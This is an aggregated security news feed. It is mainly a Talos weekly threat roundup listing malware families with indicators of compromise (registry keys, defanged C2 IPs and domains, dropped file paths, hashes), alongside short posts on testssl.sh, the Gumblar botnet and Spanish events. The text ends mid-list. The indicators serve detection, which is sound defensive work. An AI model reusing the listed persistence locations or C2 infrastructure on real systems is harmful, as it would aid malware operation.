Security Posts

testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws

Darknet - The Darkside - 5 hours 55 min ago
testssl.sh is a free command line tool to test SSL security, it checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more. testssl.sh is pretty much portable/compatible. It is working on every Linux, Mac OS X, FreeBSD distribution, on MSYS2/Cygwin (slow). It is supposed also to work on any other unixoid systems. A newer OpenSSL version (1.0) is recommended though. Read the rest of testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws now! Only available at Darknet.
Categories: Security Posts

Dancho Danchev's 2010 Disappearance - An Elaboration - Part Two

UPDATE: It appears that I'm currently persistently experiencing a pressure on my mouth including something in the lines of a toxic chemical on my nose. UPDATE: It appears that someone managed to map my place including my head and body using rubber and is persistently trying to communicate with me. UPDATE: In case you're interested in contacting me in terms of my law enforcement issues and
Categories: Security Posts

Citas para la semana que viene: Eventos, Cursos, Charlas y Conferencias

Como es habitual, uno de los días del fin de semana lo aprovecho para traeros las citas de la semana que viene. En esta ocasión no está muy repleta después de haber pasado ya por el LUCA Innovation Day 2018 y el Late Motiv de Movistar Home, pero aún nos quedan cosas por delante con el Security Innovation Day y alguna sorpresa más antes de que acabe el año. De momento, os dejo las citas de esta semana que hay bastantes cosas.

Figura 1: Citas para la semana que viene: Eventos, Cursos, Charlas y Conferencias
22 a 24 de Oct: UN World Data Forum [Dubai]El foro organizado por la Autoridad de Competitividad y Estadística Federal de los Emiratos Arabes Unidos acogerá expertos de todo el mundo para tratar los ODS fijador por la ONU para 2030. Pedro Antonio de Alarcón, responsable del programa BigData for Social Good en nuestra unidad LUCA, será ponente en la plenaria “Improving Migration Statistics – the way forward”, sobre las necesidades sociales que presentan las nuevas tendencias migratorias y cómo gracias al Big Data se puede dar respuesta a estos retos y mejorar las políticas migratorias en los distintos países que conforman los países miembros.23 a 26 de Oct: Colombia 4.0 [Colombia]
Durante estos días, el MinisterioTIC (MinTIC) organiza unas jornadas centradas en la innovación y la transformación digital de las organizaciones, en el que participará nuestro compañero Claudio Caracciolo, CSA de ElevenPaths, para hablar de cómo se puede adaptar la innovación a los procesos de trabajo habituales.24 de Oct: Data Science Awards [Madrid] [G]
Un año más, Synergic Partners, nuestra empresa especializada en consultoría y analítica Big Data dentro de la unidad LUCA de Telefónica, lanza los Data Science Awards 2018, los premios con el objetivo de reconocer a profesionales del Big Data y las mejores iniciativas empresariales y de periodismo de datos en este ámbito e impulsar así el talento analítico en España. Este día es la fecha señalada para la entrega de los premios a los ganadores.24 al 26 de Oct: Seguridad en Medios Electrónicos de Pago [Buenos Aires]
En esta jornada, nuestro compañero Claudio Caracciolo de ElevenPaths participará con una sesión el segundo día con una charla centrada en los riesgos de los medios de pago si las protecciones de los dispositivos móviles no acompañan con robustez. 25 de Octubre: Líderes de la Transformación Digital [Madrid] [*]
El País Retina organiza una jornada en Madrid, en el museo Reina Sofía, donde yo participaré con una sesión donde hablaré de nuestro AURA y Movistar Home para mejorar la interacción con los sistemas informáticos de una empresa. La jornada está llena de ponentes de gran interés, así que revisa en la web los horarios y las charlas.Figura 2: Retina LTD25 de Octubre: Thinking Party 2018 "Inteligencia Artificial" [Madrid][Streaming][G][*]
También el 25 de Octubre, y también en Madrid, tendrá lugar la jornada de Thinking Party 2018 en la Fundación Telefónica, centrado todo el día en jornada de mañana y tarde en el tema de la Inteligencia Artificial. Y sí, yo estaré allí para hablar de nuestra querida AURA, la Inteligencia Artificial de Telefónica. Tienes toda la agenda en la web del evento:Figura 3: Thinking Party 2018Nota importante de la Thinking Party 2018: Podrás seguir la jornada vía streaming, así que no importa de dónde seas o dónde estés, que podrás seguir todas las sesiones vía Internet.26 y 27 de Octubre: SecAdmin [Sevilla]
El viernes y sábado de esta semana que se nos viene toca la quinta edición de la SecAdmin en Sevilla, en la que estará 0xWord para que puedas conseguir los libros de nuestra editorial. Además, podrás pedir a Elias Grande que firme los ejemplares que quieras de su libro de Docker: SecDevOps. Entre los ponentes estará Deepak Daswani, que es CSA de ElevenPaths en las Islas Canarias. Tienes toda la información en la web del congreso.Figura 4: SecAdmin en Sevilla
27 de Octubre: BitUp [Alicante]
Y para terminar esta lista de actividades, el sábado habrá una jornada muy interesante en Alicante, con un montón de nuevos speakers jóvenes que dedicarán el primer día del fin de semana a hablar de tecnología, seguridad y disfrutar de compartir. En esta jornada estará presente también 0xWord, por lo que podrás conseguir nuestros libros allí mismo. Toda la agenda en la web del evento.Figura 5: BitUp Alicante
Y esto es todo lo que tenemos por delante para esta semana que entra. Como veis, en nuestros equipos de LUCA, ElevenPaths, 0xWord, 4th Plataform, Aura y Movistar Home, somos muy activos en las comunidades de divulgación, así que siempre tenemos alguna cita cada semana.
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord
Categories: Security Posts

Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits

According to security researchers the Gumblar botnet is making a comeback successfully affecting thousands of users globally potentially compromising the confidentiality availability and integrity of the targeted host to a multi-tude of malicious client-side exploits serving domains further dropping malicious software on the affected hosts. In this post we'll provide actionable intelligence on
Categories: Security Posts

Threat Roundup for October 12 to October 19

Cisco Talos - Fri, 2018/10/19 - 22:39

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Oct. 12 and 19. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Dgoh-6721301-0
    Malware
    This family is a generic trojan able to steal browser passwords. The samples conatain hidden hollowing techniques and TLS callbacks, making it more difficult to analyze. This malware is also evasive and can identify virtual environments. In this case, it does not show any network activity. The binaries achieve persistence and inject code in the address space of other processes.
     
  • Win.Malware.Tspy-6721070-0
    Malware
    Tspy is a trojan with several functions. It achieves system persistence to survive reboots. It also contacts domains related to remote access trojans (RATs) but are also known to be hosting C2 servers that send additional commands to the malware. The samples are packed and may hinder the analysis with anti-debugging techniques and TLS callbacks.
     
  • Win.Packed.Shipup-6718719-0
    Packed
    This signature and the IOCs cover the packed version of Shipup. These samples are packed and gain persistence by creating a scheduled task to conduct their activities. They also inject malicious code in the address space of other processes and may hinder the analysis with anti-debugging and anti-virtual machine checks.
     
  • Win.Malware.Icloader-6718315-0
    Malware
    Icloader is a generic malware family with an heavy adware behavior. The samples are packed and have evasive checks to hinder the analysis and conceal the real activities. This family can inject code in the address space of other processes and upload files to a remote server.
     
  • Win.Malware.Dfni-6718298-0
    Malware
    Dfni exhibits behaviors of adware, and can be considered a generic malware. The samples are packed and contain anti-VM checks, as well as many anti-debugging techniques. The binaries hook functions on the system and inject code to perform its malicious activities and upload files to a remote server.
     
  • Win.Malware.Mikey-6718286-0
    Malware
    This cluster focuses on malware that gives other malware the ability to achieve persistence. The samples contain anti-analysis tricks as well, which makes it tougher to study. This family is known for its plugin architecture and its intense network activity.
     
  • Win.Malware.Dinwod-6718271-0
    Malware
    This family is a polymorphic dropper. It copies modified versions of itself to the root directory with random names, then deletes the original files. These binaries drop a DLL that is injected. All the binaries are packed and contain tricks to complicate the static analysis phase.
     
  • Win.Malware.Triusor-6717792-0
    Malware
    Triusor is an highly polymorphic malware family. All the binaries are packed and obfuscated to hinder the static analysis. The malware contains code to complicate the dynamic analysis. Once it is executed, the samples perform code injection.
     
ThreatsWin.Malware.Dgoh-6721301-0
Indicators of Compromise
Registry Keys
  • <HKLM>\Software\Wow6432Node\Microsoft\WBEM\CIMOM
  • <HKLM>\SOFTWARE\CLASSES
  • <HKLM>\Software\Microsoft\Fusion\GACChangeNotification\Default
Mutexes
  • Global\CLR_CASOFF_MUTEX
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
  • \PC*\MAILSLOT\NET\NETLOGON
  • %LocalAppData%\Temp\tmp3456.tmp
  • %LocalAppData%\Temp\bhv35DC.tmp
File Hashes
  • 144dde1f11ae0c405712b370a8599c0497241e637e8fc82e72f64f909a88091e
  • 19287951443ce4dbf938aea1b13f859130d0a8a93581fef391a09d6b7c632157
  • 289f982e4f40d54431c2bfd462b9ab13334bb4038ce2bce60c78689ddddcf931
  • 35757c2e08e8536a0a8498cbbdbe4b7563e6bc03e9d3a443023d923d16fef052
  • 3a22acf82521b4afb12bb99e5c538a4ef329e929ff9b7f118da3a8296a00014a
  • 42442912f6d5d85b0465b6a81f579759123945c1eeae49fbeb1e14642c83a522
  • 44b3f421a16b418893ebf279dcb78302432059f06a240d061fad5cae4d570b0d
  • 45e1f1da441906c91474e8cd14d03a1360a44e1d3a0a716868b38d97a90fa728
  • 463e95e0cabd904e70facd1ad3698ac291f5963b55d6f9540e0afddf2e915c78
  • 4c695e0e5a5e74bfd9474b7ad56f1996eed68993b82e72f755e4654162c94286
  • 5eedbfbc1532012e6694da33a5bbb4213a566c7379d2c7ccbf4ed1fef6ca0fec
  • 79965e71b237768da06e87edaff46529864e0e3224866ffeb8291c6f9a95c4cc
  • 85ed48aef7052d974630e1e350c3557a509dd4f6f26a2ca31fc82b81f3e97417
  • 8e5c5f04842cb799b7ca42a2e47c02a8a0c53a21ea579a42d90115fe40149c4b
  • b2948e790aa955885082c85dc72d4be259001f68be6414b8d53e5a6ce60ed3c3
  • b731fbba5419d28bc588981182cf95cb142559c0184714f7f781544107670a75
  • ce7de4cc59658ee179955f1c9c475ceb5e0bffeb6eb0be35b97d99845b42e93c

Coverage
Screenshots of DetectionAMP




ThreatGrid



Win.Malware.Tspy-6721070-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKLM>\System\CurrentControlSet\Control\DeviceClasses
  • <HKCU>\Software\Microsoft\SystemCertificates\MY
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
    • Value Name: F
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
    • Value Name: F
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
    • Value Name: F
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 151[.]80[.]159[.]160
Domain Names contacted by malware. Does not indicate maliciousness
  • myp0nysite[.]ru
Files and or directories created
  • %System32%\config\SAM
  • %LocalAppData%\Temp\-218562641.bat
  • \TEMP\3101985327.exe
File Hashes
  • 22ef53123754caa2ac3871eb01221c99482e4318b59a30c8f07b9525afae52bd
  • 2953715def863a583bbca5dd830110b158d439ab138e278f7b4302e00b32349c
  • 356d54baec2c91a1acf01fba63efb0c372588b8af954f2ec06b713bd35fcebac
  • 46adc5747d33d6f76574f8c3df31828649159a8b0737b90233023db526f1df36
  • 4735ef713e8010be450f1114f5b47c56f7245e5511d5cf51c81cf4095331c2cc
  • 5431fac0d6c31b0234b32a360541d4142b01e020a3f5958a814aed2f7376c5d4
  • 5f51e8d0681a97d9cc8d08d8053be6ca7fe99570ce74437ceebc61277dd39295
  • 60eba00dd87e876f06d07940b33759f791c5deff12e5c435df38410a7be37b0f
  • 7a78e62befe10074809a5889aa2cb15b48ae18ff643ba9913f77e9277b9ddb5f
  • 7d22af262faaccd05bf7b1beeb2640babb7f9b635c33c55a1f116649702c6651
  • 816593fbb5469d27ac05c4eeaed262ce5486ceef3aa50f6a5991dbf87e0b6e29
  • 833ae0d041b2c2c7196105f2cc2a77c5aca67e701ef8407b5817639bdff9a88b
  • 902035ad4a8c6a13029757688b35a3494a8a914567b382e2d2ac831b43aa087a
  • 9e1ce778a3ce36fc530e6afe53aa4a5876bdc49ee9c3ecd06cd8098357022963
  • b1b6840d7b373303f2dee59b5735ac70895986c5670a6d00f6c71dc0b5bc9db7
  • d4d6b8126d2b3886cef618d0a38c16df140f3c261f50cb51b263ccd4dc0060a8
  • dea62764758a8f94fe90d430d70ffbfcb6781bf1e85a1df1370f4fdc13b96e0b
  • e2f3c345b99ee26a3277ce52e3577c2fe8c31faa13efe74476493444d99116ed
  • eef55e6ac86833cbfc3e70d40acd9672ebd68ea278b5bd72e6d33937fa60a39d

Coverage
Screenshots of DetectionAMP




ThreatGrid




Umbrella


Win.Packed.Shipup-6718719-0
Indicators of Compromise
Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
    • Value Name: LoadAppInit_DLLs
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
    • Value Name: AppInit_DLLs
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\HANDSHAKE\{F2B28AC6-1443-43F4-9832-8315397F35E8}
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\HANDSHAKE\{F2B28AC6-1443-43F4-9832-8315397F35E8}
    • Value Name: data
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\PROGRA~3\Mozilla\thfirxd.exe
  • %System32%\Tasks\aybbmte
  • %SystemDrive%\PROGRA~3\Mozilla\lygbwac.dll
  • %SystemDrive%\DOCUME~1\ALLUSE~1\APPLIC~1\Mozilla\kvlcuie.dll
  • %SystemDrive%\DOCUME~1\ALLUSE~1\APPLIC~1\Mozilla\tfbkpde.exe
  • %WinDir%\Tasks\kylaxsk.job
File Hashes
  • 039882173f4c41312943a6481bd41bddeb0603fc3077c09e99234bebd14266e5
  • 03bd8e2ed9a432a0883ea1acec24c87850127570809c63695bd542a602ba98bb
  • 03e346b9acec0f19bd9d6c0ac40b3ebfbd5e1097708ca6e744cf67ee79dcc9db
  • 04e34571fb0e04658c6d2eb23d908dbc378156fd094f861b7869b2281bc303b5
  • 05e7685b2efa6d6f1fb0c23c6c944f911728a35b2aaa1c1d0662631c374380ae
  • 07042f40f8e0114d7ea3f763a11fc2b0a5cc265238ad57f79710bfcd8917742e
  • 09ace282d6e455c62ba311a89dba6af3274d6e8096b2319c746a129e6c411143
  • 0d63b1289a4bf524359210fcfbfe84762f448911b51a495123b093ce5750ec3f
  • 0f9f448741905479e3504d81a56ada969d0e70287875bcaf18a08cfab63151e8
  • 1030c244fcf87f701b35f9a0fbad4f1e907dc0c5f8bc5ba6e4b6ca359bac9a09
  • 179c0c751b09104e903c6864d9bca8f46386d44ce24e4bf1ebd972be81a9bde3
  • 18205e2caa3af4a991891435f52a4b5f93e3405a1cbc2c88e2491d245fb33169
  • 186f16724db6160aafff7a7696b321d2bb070c6c794564c613904dabce6bf089
  • 194a07b39470d6f3d75292503dfb8d4c39a8a0b8d7a48ebd7b8bd3846e915e74
  • 19f9d7a380494e5329edcc1aefe1e1bbb8b3e97b4b437ebdc8253959b6f3c503
  • 1fb5b2a484b56dee8f91a761ddcd71aca409298d79717cbd305f8c4a115a377a
  • 21561b93554c509f88981504de06bf325182b11718e5e1bbc348b3e9bf40ab9b
  • 2222e6fcf6a7ab4fb824885a47869ff0b75b83c005ad1e56a48b9ac60603e00c
  • 23e1307f7478faf6edb20b4caf72344cfbdde1a3a88669433b07c15ab6276e78
  • 26074d1d9576a6f348861d388c6d33fe83154a4d6177ad128f327d56d61e93c4
  • 269d9e25d3fa50c06d20da82f572324448d689bb8131a9b146f9094aa6f35486
  • 27107374ee6385cc550f4cfe92a2b90b373f2f186d1c0cdac26d7cd941a45de1
  • 27ec15846eb320ef0fcd627e2606e51b398693df813f468eb8a08727005b6ccb
  • 2a199ff9c9922e8656a00622c5df7bc0db3b89d4ca5eda2ff304725b4e4791d3
  • 2c1f9fcebf203434c44710f59bbfd6b8dc7186cb472975964f4621fde162a9a7

Coverage
Screenshots of DetectionAMP



ThreatGrid


Win.Malware.Icloader-6718315-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKCU>\Software\Microsoft\SystemCertificates\My
  • <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
  • <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
  • <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]201[.]249[.]16
  • 5[.]149[.]248[.]134
  • 185[.]87[.]195[.]36
Domain Names contacted by malware. Does not indicate maliciousness
  • static[.]16[.]249[.]201[.]195[.]clients[.]your-server[.]de
  • official-site-cheats[.]ru
Files and or directories created
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
  • %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat
  • \ROUTER
File Hashes
  • 09bb7975b2b3841a5cdef1b88b8ac11093bdd4dbd494b4d6af270f848ea85f89
  • 12b1ee5b0cba81b875e5e51bfdc09e782d2a8cd77cc3fb239283898cba768815
  • 4ef33bcc856ec74000212666285ab7f944cda254bf8703339d385da81ba03433
  • 50ca40354710a54ee7eeef160fc7ef7a527890184c76579ad5dfb08cce7a345c
  • 544a3b3251664970097188e7557d476a5640404e0925a1bab3186de284c6f2a0
  • 5b87701da8929701c563806f7e2bdb5babe411cdffae08a63470c62a1f811674
  • a15f95b1440da055d9289084eae7adaefc0c53253e093f8ea07f6080a3f1bb16
  • c78cb949042685e156e2532f0ca8eb525c0c162384691c21436866d6477239c1
  • ce2d96827f323a716aed634705c39e22425e75b239f74945eb2669fecba4ef51
  • e5dd8c5e4b91ce17be74bb11e33f8b725aae330a8a78019232f438788b233784
  • e9a9a86b1cd0c1ee7ffbed8cfab0d463a899c6c070af3521f42d7d35ead8b96d

Coverage
Screenshots of DetectionAMP




ThreatGrid


Win.Malware.Dfni-6718298-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  • <HKLM>\Software\Microsoft\RAS AutoDial
Mutexes
  • \BaseNamedObjects\GenericSetupInstaller_UT006
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]201[.]249[.]16
  • 5[.]149[.]248[.]134
Domain Names contacted by malware. Does not indicate maliciousness
  • static[.]16[.]249[.]201[.]195[.]clients[.]your-server[.]de
Files and or directories created
  • \ROUTER
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\Carrier.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\GenericSetup.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\GenericSetup.exe.config
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\installer.exe
  • %TEMP%\Microsoft_Office_2003_Crack_Full_Version_Free.exe
File Hashes
  • 0b6f97ca1435e9264468c370f04f27ec1a1a73bd5ffc111ba3155c13fb98faa7
  • 21879cd4402d686df1b5216d0ee04b8205041ec88efa74b5647c1e8867aec045
  • 235354c4ff05fe220b4182745eb6cda23d346201bc1f0cd095fe9f5b365d9fc8
  • 263713f594a0bd2f1307fe7fc15802a4689c71fbe84641e6f2487d560265be27
  • 497be4c1fa250d9fbc98502a2d94ab7b9a8333a4320da73ef03073e4621e7c22
  • 51c88f1d544e08460f8460eb586db6f8064b59eac4927cc0762abe8ab395bcec
  • 551d34451ade2931165caf86f3ab48a833ad32e1625a32975961d0451e761967
  • 5a8db36dcddcb13c7e9fb5d975026292bfbd8c3618f0de45ce4cafb7470164d7
  • 60bc15b68fee8d28ba76e99475b2fadbf72a7efd2cee8eb12f23f8e5b88a9896
  • 6c730b4762c6f31e2b4c8845361650e5775bfd5876535d0f12523d22da4258f3
  • 79558d1978785896623d7f82404950345a0646ee20e78a75ca8cfbc70d828290
  • 7a1c9cf27ef8be7d94ad56517b8a7b79b8b508ee698667f266bb597f1cd5c6b0
  • 8530c888819eabbdfb0f3f3d149ae11a242a82a7f19d019e23a7e7846a231f3f
  • 8b0192dfdbe2214216a9b0d941e578d1652d2b220762d055bd8c881158107a46
  • 8e7a3a856d6f7a7e2ba824da91b47c9d2c9759e642ab42f046f1ac533a9fbe29
  • 93e9bff209879823e7ee4fe8a160526f15d0ee01f52992863b609b787c427502
  • 995ca1c36a5dc65ccbc878a74b08c6b36cbc282e792a9ba6767271f93f3cfdda
  • 9a1cddbba9b9dcf9c7c9d651c8fe390665b485895e26e78f4a1b4b1303c8c299
  • 9c736aea53c7b192afbdc97106e95f98804f4a5c7feaa92c0a7d796cf9092c12
  • a7c5b9cae00ea432de0723f4a71d3b266f152935e5ce8127d5c01c91ea156abe
  • abfcfc795d72a5afd80010f351ab683a61bfabde66b7b2c1813d7ac5cc9f65d6
  • add5411deb3f26fca1e60eb72757d0a2488f4bd3d44433afa71fd2c2afc84ec2
  • b172fcfae21952777f9bac5ecdc4695e120fe425cfa98db9169fdda5065a3848
  • b935519061e2af2022dcd28f94fc7747b87c6c952acffff5c5a034ae6c8e395c
  • b994e47854a8557397fb0ed73c2fa16e2a7099167ff605290f4ae1282951b2a0

Coverage
Screenshots of DetectionAMP




ThreatGrid


Win.Malware.Mikey-6718286-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
Mutexes
  • RasPbFile
  • Local\http://hao.360.cn/
  • Global\b002b2c1-cf34-11e8-a007-00501e3ae7b5
IP Addresses contacted by malware. Does not indicate maliciousness
  • 143[.]204[.]31[.]154
  • 143[.]204[.]31[.]216
  • 143[.]204[.]31[.]231
  • 143[.]204[.]31[.]105
  • 143[.]204[.]31[.]64
  • 143[.]204[.]31[.]128
  • 143[.]204[.]31[.]78
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]zhihu[.]com
  • www[.]zgny[.]com[.]cn
  • www[.]zhangmen[.]com
  • www[.]xs8[.]cn
  • www[.]zongheng[.]com
  • yule[.]360[.]cn
  • www[.]zhiyin[.]cn
  • yys[.]163[.]com
  • www[.]weibo[.]com
  • www[.]xxsy[.]net
  • www[.]youth[.]cn
  • yunpan[.]360[.]cn
  • you[.]163[.]com
  • xiaoshuo[.]360[.]cn
  • www[.]ymatou[.]com
  • www[.]youku[.]com
  • www[.]zol[.]com[.]cn
  • www[.]xiachufang[.]com
  • www[.]zhanqi[.]tv
  • yuehui[.]163[.]com
  • xqn[.]163[.]com
  • xiaoyouxi[.]360[.]cn
  • www[.]yy[.]com
  • xueqiu[.]com
  • www[.]xinhuanet[.]com
  • zonghe[.]hao[.]360[.]cn
  • xyq[.]163[.]com
Files and or directories created
  • %ProgramFiles% (x86)\DouTu\
  • %ProgramFiles% (x86)\DouTu\DouTuDaShi.exe
  • %ProgramFiles%\DouTu\DouTuDaShi.exe
File Hashes
  • 008f25d1573dc62790a69f7a80f5c5453cc5648fe75e2899c02763fe15ff2b0a
  • 011abed6d2117fd5f07cf18ba13fa84957111014baaa12037ae8dee7d342394b
  • 01c8e1e8e172e4605f818fca1c69ef8c92c5ac696248d3b9ccdfa41ac79f214b
  • 0247a8bbc1c947fcf3774ca4785f8896dcef41d0334b37dcf5bac1931d027463
  • 027a08518f203197ec8a4203a27a356b3e25c223e6920ea3809bbed0842028ad
  • 02989e9f1e9714b5c005b905ad9edccc155e4cba50ddcdaab759270a21ce5bd9
  • 02b19d089cdd330d32c2d7e26cb0e2575cb06a4af1d6d55dc100ae26798e4ed1
  • 02d6261ea6726eb0d1652ccd6e4469c29e029daafa4e97c2d91e1984267a7bcd
  • 02fd2646ae865182ba854029a5247ca1401146d82adf4aa7fe7289d5e50e170c
  • 036ba848a3d7f075c78fc8a61c9df37b347e092271532a4ea97e6c63bd69e014
  • 03750181545151e7ca1dba3b73b24f10a94b8728d58fb63c3f7be0d7307d445d
  • 03d612255a4c15406d36ad52ad1a36d03e894e0541fa46b27f36a460bb8e683f
  • 0445d150e6f6598afb477304f72a82d7d929affccbc49240f840a73846f0c32f
  • 045c8475c4206748d2bacbfbfad3696cce3eeeebc12b59ffd70db1b65238cb36
  • 045de43a1c41fa03972c7d7560e639b004eda82db939eb9bf9e42c074e3feae5
  • 046dd51f8b053aacf0ec0c5f267f78e1fda082abaf06a0ea627bcdab21261bc9
  • 04b95424c0d4857b95ec76b43831e050a84dbc9f6396a4ef02784a08237b1e1c
  • 05323e80a0d216c41f64a274cf8fd20a21cce709c1f45ad931bc1273f115000e
  • 053dee417b15f6231492987a7d4015a78025a6a0ceb996cd155651055c322be7
  • 055c4a203cb1230ae63c23100fe9d649b5551885c47c9388814fb6f41462dbac
  • 0563fa1ab4ddddf921ff3bb655498dc4eb91b3a6c679632888a6c81c20453912
  • 0580794965a50a2c165c7c33f0873759251340c57c57e67c5a71b4c26741b3f7
  • 063110c27a66a2bf0a1dd1f6acfe49ce521cb159f2a69bc896b1a7e6025a3c12
  • 06b7cd56f7a52f74181481506b1b757deb87c52e180ab87fa47cec734e11cbbd
  • 0707db8cc197898312024658ee079141f97d5b296589c616408c516a74e36af6

Coverage
Screenshots of DetectionAMP




ThreatGrid


Win.Malware.Dinwod-6718271-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \vnnjj.exe
  • \xxhdx.exe
  • \xxldt.exe
  • \xxlhl.exe
  • \vnjvvj.exe
  • \rvrnnf.exe
  • \rxjxbdx.exe
  • \vnrjn.exe
  • \rvrnbj.exe
  • \xxltpx.exe
  • \vnnbn.exe
  • \vnjrv.exe
  • \xxltxdh.exe
  • \xxlhptp.exe
  • \xxhtp.exe
  • \xxxpptl.exe
  • \xxpxthd.exe
File Hashes
  • 007afe2d9baf2e79d00facd2d2d8a4639a792549950386c4f08771ecdf86a5e5
  • 015cdf503ff9594a6fe59d9c2abce53201b36239758bf2341f4a57029daba488
  • 01758e0d8a5558093a58179ae367d4e2f61c10f0758531179aefc2646ba67dd0
  • 07c97c9e72fb5dbec619c404f63a11b912fc8cd8990c9c2f2a94997d41cbd693
  • 15df5a862fac9f36fa3d01654b477b69c83f0e6e3f34506df7cacc690277c031
  • 16347664bea3a83ff23d0f70bdfc89687cd318c9006f641f51e68812647209d8
  • 16d3e585d490cc2ace4d332483e6cfdb58e0b9601a60d8cb1b67fe37ed240f32
  • 1c9522f2196142541138d63c8540a50779766c018808c9dcbb9ae307fabb6727
  • 1ca02fc758959c2b256e2c102528ea5f7d638f2c5191877816f55ff218a491df
  • 280e74d7df292e3a70d32d6cf513477d99e2a8b00c9263a93177ce4f54dcfcd0
  • 2a430cc8543cce3005dcfe77a4c4672e055c5f809240ef8c0b4a5c5279335a9d
  • 32e231bbd83b5f5320a72ba32873ec1c72426b79e86f9c8fc53a3a068f54b01f
  • 39970304ec55d19bd8fb7e9085a16e1321fb4c1f56234dc7cb28ebf85c2559ef
  • 3b16d31f053dafae6636d5e9e6e177c6d3191d792f08f88ebb20eeab64004056
  • 3bc11dacaf93b0456579318c1adeffef853571a637ce549cb788785917b18630
  • 3f1a60c94db70e837c93a5606c622e83d7d728efba2ace44d5a1e25fb9928694
  • 40dffd1df7de4c7734b9d91197f1504abfdf0483041e86babce29800cf676bc5
  • 42760b3beca693ce536a40114e82b7140e9c31b0a0ea3bda6fd35145d385796c
  • 45727028125d1469bbd80957da53beccda382215eedf08749e166401188db598
  • 45965701e3a09e642aa72c4361dff31ab136c691a4b1d196ff040b07fef6ff3c
  • 494fb24fb1bec50a5373d81c28a65f1f3369ccb236e37aa307abb6218aa0bd72
  • 4bc8924ba147f81bc910a1f0a5225cfd25b78d91d8d8725df3db4edb2229732b
  • 4c7c63cd5f5a1a51850ad6c85e08fdfb7d4bf3add81bc45eb2ec3026314b6510
  • 567ee64a97f8ecbf847637702ceb1fce80c5c785ccb8b838bc544bb92657a11b
  • 5b5a40109c12f9ce3ed228625bd2d15e93b17fcee2ffb3d234714a7e0c4f8732

Coverage
Screenshots of DetectionAMP




ThreatGrid


Win.Malware.Triusor-6717792-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • \BaseNamedObjects\---
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\I386\FAXPATCH.EXE
  • %SystemDrive%\I386\NTSD.EXE
  • %SystemDrive%\I386\REGEDIT.EXE
  • %SystemDrive%\I386\SYSPARSE.EXE
  • %SystemDrive%\I386\AUTOCHK.EXE
  • %SystemDrive%\I386\AUTOFMT.EXE
  • %SystemDrive%\I386\EXPAND.EXE
